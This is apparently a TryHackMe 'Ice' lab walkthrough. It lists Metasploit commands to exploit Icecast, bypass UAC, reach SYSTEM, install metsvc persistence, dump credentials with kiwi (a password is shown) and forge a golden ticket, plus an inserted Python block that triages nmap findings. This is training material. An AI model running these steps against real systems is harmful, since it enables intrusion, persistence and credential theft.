Room Link : https://tryhackme.com/r/room/ice
STEP1
nmap -Pn -sSV 10.10.98.252
FINDING
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http          Icecast streaming media server
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
49160/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
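The scan output above is the kind of text you end up pasting into notes; a small parser that turns it into structured findings makes the exposure surface (Icecast on 8000, SMB on 445, RDP on 3389, the dynamic RPC range) explicit. This is an added example, not part of the room or the original notes; the triage rules and severities are assumptions constructed for the example, and the sample text is a trimmed copy of the page's own scan rows.

```python
import re
from dataclasses import dataclass

# Constructed sample: the open-port rows as they appear in the page's nmap output
# (trimmed to a few rows; this is pasted text, not a live scan).
SAMPLE_NMAP = """\
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcp  open  http          Icecast streaming media server
49152/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One nmap port row: "<port>/<proto> <state> <service> [<version ...>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class OpenPort:
    port: int
    proto: str
    service: str
    version: str


def parse_nmap(text):
    """Return OpenPort records for every 'open' row of a plain-text nmap report."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m and m.group(3) == "open":
            ports.append(OpenPort(int(m.group(1)), m.group(2), m.group(4),
                                  (m.group(5) or "").strip()))
    return ports


# Triage rules: (predicate, severity, note). Assumed/constructed for this example;
# the severities follow the room's storyline, where Icecast is the entry point.
RULES = [
    (lambda p: "icecast" in p.version.lower(), "high",
     "Icecast streaming server exposed; the room's foothold module (icecast_header) targets it"),
    (lambda p: p.port == 445, "medium", "SMB exposed to the network; restrict to required hosts"),
    (lambda p: p.port == 3389, "medium", "RDP exposed; enforce NLA and limit source networks"),
    (lambda p: p.port >= 49152 and p.service == "msrpc", "info",
     "dynamic RPC endpoint (expected when 135/tcp is open)"),
]

ORDER = {"high": 0, "medium": 1, "info": 2}


def triage(ports):
    """Apply the first matching rule to each open port; highest severity first."""
    findings = []
    for p in ports:
        for pred, sev, note in RULES:
            if pred(p):
                findings.append({"port": p.port, "severity": sev, "note": note})
                break
    return sorted(findings, key=lambda f: (ORDER[f["severity"]], f["port"]))


if __name__ == "__main__":
    for f in triage(parse_nmap(SAMPLE_NMAP)):
        print(f"{f['severity']:6} {f['port']:>5}  {f['note']}")
```

Feed it the full `-oN` output of a scan and extend RULES with whatever your environment treats as out of policy; unmatched ports simply produce no finding.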
-------------------------------------------------------------------------------------------------------
STEP2
msfconsole -q
search icecast
use exploit/windows/http/icecast_header
set the required options and run exploit
bg -- background the session
-------------------------------------------------------------------------------------------------------
STEP3
search exploit suggester
use post/multi/recon/local_exploit_suggester
set SESSION to the backgrounded session
run
-------------------------------------------------------------------------------------------------------
STEP4
use exploit/windows/local/bypassuac_eventvwr
set SESSION
set LHOST
run
-------------------------------------------------------------------------------------------------------
STEP5
sessions -i 2
getprivs
SeTakeOwnershipPrivilege -- listed among the privileges; nothing to do with it here
ps -- list the running processes
migrate <pid> -- move meterpreter into another running process
shell
whoami
nt authority\system -- we are SYSTEM, the highest-privilege account on the machine
-------------------------------------------------------------------------------------------------------
STEP6 (OPTIONAL)
in meterpreter
run metsvc -A -- keep persistence even after the machine restarts
-------------------------------------------------------------------------------------------------------
STEP7
in meterpreter
load kiwi -- an advanced version of mimikatz; it also expands the help menu
creds_all -- dump all users and passwords
FINDING
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
-------------------------------------------------------------------------------------------------------
STEP8
in meterpreter
golden_ticket_create -- allows us to authenticate anywhere with ease
dir *.txt /s -- search all .txt files
dir flag* /s /p -- search for flag.txt
dir /s /b flag.txt
-------------------------------------------------------------------------------------------------------